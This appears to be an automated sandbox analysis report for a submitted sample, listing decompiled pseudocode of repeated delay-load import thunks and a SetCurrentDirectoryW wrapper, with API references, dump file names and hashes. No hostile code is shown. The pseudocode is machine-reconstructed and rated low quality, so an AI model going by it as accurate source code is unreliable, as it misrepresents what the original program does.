                                                        C-Code - Quality: 22%
                                                        			E00A1DDAF() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xa3bde4); // executed
				E00A1E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                        0x00a1dd74
                                                        0x00a1dd79
                                                        0x00a1dd80

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DD79
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: f75fa285935c693045187447f2a6f123740467984baafc49966c4f88e7d12d73
                                                        • Instruction ID: 9f16d19fec08cfce6aa64fb46a22a1206b221f313aec44fd9a1f276186a4c14b
                                                        • Opcode Fuzzy Hash: f75fa285935c693045187447f2a6f123740467984baafc49966c4f88e7d12d73
                                                        • Instruction Fuzzy Hash: 78A002D91695037C350461517D56CBA015DD4C4B557305E5AB5419404155541C851431
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DDB9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 22%
                                                        			E00A1DDB9() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xa3bde4); // executed
				E00A1E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                        0x00a1dd74
                                                        0x00a1dd79
                                                        0x00a1dd80

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DD79
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 788e6912ee4d0941044e676f6d188450aafd55dc489271f8ae1550ffe9db893b
                                                        • Instruction ID: 9f16d19fec08cfce6aa64fb46a22a1206b221f313aec44fd9a1f276186a4c14b
                                                        • Opcode Fuzzy Hash: 788e6912ee4d0941044e676f6d188450aafd55dc489271f8ae1550ffe9db893b
                                                        • Instruction Fuzzy Hash: 78A002D91695037C350461517D56CBA015DD4C4B557305E5AB5419404155541C851431
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DD87 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 22%
                                                        			E00A1DD87() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xa3bde4); // executed
				E00A1E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                        0x00a1dd74
                                                        0x00a1dd79
                                                        0x00a1dd80

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DD79
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: bdfcdbc073796fed75db332c21837a017d011e7d4e27753df4922e9a7f76e74b
                                                        • Instruction ID: 9f16d19fec08cfce6aa64fb46a22a1206b221f313aec44fd9a1f276186a4c14b
                                                        • Opcode Fuzzy Hash: bdfcdbc073796fed75db332c21837a017d011e7d4e27753df4922e9a7f76e74b
                                                        • Instruction Fuzzy Hash: 78A002D91695037C350461517D56CBA015DD4C4B557305E5AB5419404155541C851431
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DD91 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 22%
                                                        			E00A1DD91() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xa3bde4); // executed
				E00A1E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                        0x00a1dd74
                                                        0x00a1dd79
                                                        0x00a1dd80

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DD79
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: bcd862ecd31eaa7c7f27eb66b3b7a1eda9f10a4f57c626ebfcbd7742aae180e3
                                                        • Instruction ID: 9f16d19fec08cfce6aa64fb46a22a1206b221f313aec44fd9a1f276186a4c14b
                                                        • Opcode Fuzzy Hash: bcd862ecd31eaa7c7f27eb66b3b7a1eda9f10a4f57c626ebfcbd7742aae180e3
                                                        • Instruction Fuzzy Hash: 78A002D91695037C350461517D56CBA015DD4C4B557305E5AB5419404155541C851431
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DDC3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 22%
                                                        			E00A1DDC3() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xa3bde4); // executed
				E00A1E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                        0x00a1dd74
                                                        0x00a1dd79
                                                        0x00a1dd80

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DD79
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 2a1fa674a91dec0e90ab77e960eb6c88f086224da595ada29479323f03532090
                                                        • Instruction ID: 9f16d19fec08cfce6aa64fb46a22a1206b221f313aec44fd9a1f276186a4c14b
                                                        • Opcode Fuzzy Hash: 2a1fa674a91dec0e90ab77e960eb6c88f086224da595ada29479323f03532090
                                                        • Instruction Fuzzy Hash: 78A002D91695037C350461517D56CBA015DD4C4B557305E5AB5419404155541C851431
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DD6C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 22%
                                                        			E00A1DD6C() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xa3bde4); // executed
				E00A1E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                        0x00a1dd74
                                                        0x00a1dd79
                                                        0x00a1dd80

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DD79
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 8fb9c4f045a98b345d333e4a6b03a9efea09460bb1652f7651bb3c36068fe9e6
                                                        • Instruction ID: 79068332ea6d21963302e1923819d241a1881bd5048e8ae745c411c027ed315a
                                                        • Opcode Fuzzy Hash: 8fb9c4f045a98b345d333e4a6b03a9efea09460bb1652f7651bb3c36068fe9e6
                                                        • Instruction Fuzzy Hash: 60A002D91655027C350461A17D56CBA015DD4C0B557305A5AB5419404195541C851431
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DEBE Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 22%
                                                        			E00A1DEBE() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xa3be44); // executed
				E00A1E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                        0x00a1de97
                                                        0x00a1de9c
                                                        0x00a1dea3

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DE9C
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: a8ecbd385f85527cab6df1569f680b420e7089925648e5b826804cdebe7fabc2
                                                        • Instruction ID: a684782eb341deacb6b14ba4564b988bef52c0918a4f3e07484ff9a56c13174d
                                                        • Opcode Fuzzy Hash: a8ecbd385f85527cab6df1569f680b420e7089925648e5b826804cdebe7fabc2
                                                        • Instruction Fuzzy Hash: FFA002962691037C350851556D57CF6026DD4D4B517305D19B5019408159501C851035
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DEE6 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 22%
                                                        			E00A1DEE6() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xa3be44); // executed
				E00A1E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                        0x00a1de97
                                                        0x00a1de9c
                                                        0x00a1dea3

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DE9C
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: aa7ee4b3cf7b22c8a7653c82594dc2c5d4fd62f2f8ab11dc0ec7cee324fecbd0
                                                        • Instruction ID: a684782eb341deacb6b14ba4564b988bef52c0918a4f3e07484ff9a56c13174d
                                                        • Opcode Fuzzy Hash: aa7ee4b3cf7b22c8a7653c82594dc2c5d4fd62f2f8ab11dc0ec7cee324fecbd0
                                                        • Instruction Fuzzy Hash: FFA002962691037C350851556D57CF6026DD4D4B517305D19B5019408159501C851035
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DED2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 22%
                                                        			E00A1DED2() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xa3be44); // executed
				E00A1E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                        0x00a1de97
                                                        0x00a1de9c
                                                        0x00a1dea3

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DE9C
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: cc59e51ff3eba28372a68b9c69b45577b710fce505498b44802b8519685986d2
                                                        • Instruction ID: a684782eb341deacb6b14ba4564b988bef52c0918a4f3e07484ff9a56c13174d
                                                        • Opcode Fuzzy Hash: cc59e51ff3eba28372a68b9c69b45577b710fce505498b44802b8519685986d2
                                                        • Instruction Fuzzy Hash: FFA002962691037C350851556D57CF6026DD4D4B517305D19B5019408159501C851035
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DEDC Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 22%
                                                        			E00A1DEDC() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xa3be44); // executed
				E00A1E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                        0x00a1de97
                                                        0x00a1de9c
                                                        0x00a1dea3

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DE9C
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: cfdd506c85ab079e3a13108a9bf3dbf87f974567f4ca9b29eddf0316e3290390
                                                        • Instruction ID: a684782eb341deacb6b14ba4564b988bef52c0918a4f3e07484ff9a56c13174d
                                                        • Opcode Fuzzy Hash: cfdd506c85ab079e3a13108a9bf3dbf87f974567f4ca9b29eddf0316e3290390
                                                        • Instruction Fuzzy Hash: FFA002962691037C350851556D57CF6026DD4D4B517305D19B5019408159501C851035
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DF0B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 22%
                                                        			E00A1DF0B() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xa3be64); // executed
				E00A1E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                        0x00a1def8
                                                        0x00a1defd
                                                        0x00a1df04

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DEFD
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 6aafb6ed28c9f59b2222bcdb55c810579ad1a8472d93531df599c7bb96f29f40
                                                        • Instruction ID: 1ad09244e91189d88c9adfdab3e61d12574b9ef1e6f01305eaeb0cb9e4cce4ef
                                                        • Opcode Fuzzy Hash: 6aafb6ed28c9f59b2222bcdb55c810579ad1a8472d93531df599c7bb96f29f40
                                                        • Instruction Fuzzy Hash: 91A002A65691037C754861556D56DF6016DD4D4B517305D19B5019849155503C851031
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DF15 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 22%
                                                        			E00A1DF15() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xa3be64); // executed
				E00A1E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                        0x00a1def8
                                                        0x00a1defd
                                                        0x00a1df04

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DEFD
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: b89c3f219f9e99434245f81c4582d2e8252e2494e3d3c62131f0452bd08c9f59
                                                        • Instruction ID: 1ad09244e91189d88c9adfdab3e61d12574b9ef1e6f01305eaeb0cb9e4cce4ef
                                                        • Opcode Fuzzy Hash: b89c3f219f9e99434245f81c4582d2e8252e2494e3d3c62131f0452bd08c9f59
                                                        • Instruction Fuzzy Hash: 91A002A65691037C754861556D56DF6016DD4D4B517305D19B5019849155503C851031
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1A5B3 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E00A1A5B3(WCHAR* _a4) {
				signed int _t2;

				_t2 = SetCurrentDirectoryW(_a4); // executed
				asm("sbb eax, eax");
				return  ~( ~_t2);
			}




                                                        0x00a1a5b7
                                                        0x00a1a5bf
                                                        0x00a1a5c3

                                                        APIs
                                                        • SetCurrentDirectoryW.KERNELBASE(?,00A1A817,C:\Users\user\Desktop,00000000,00A4946A,00000006), ref: 00A1A5B7
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
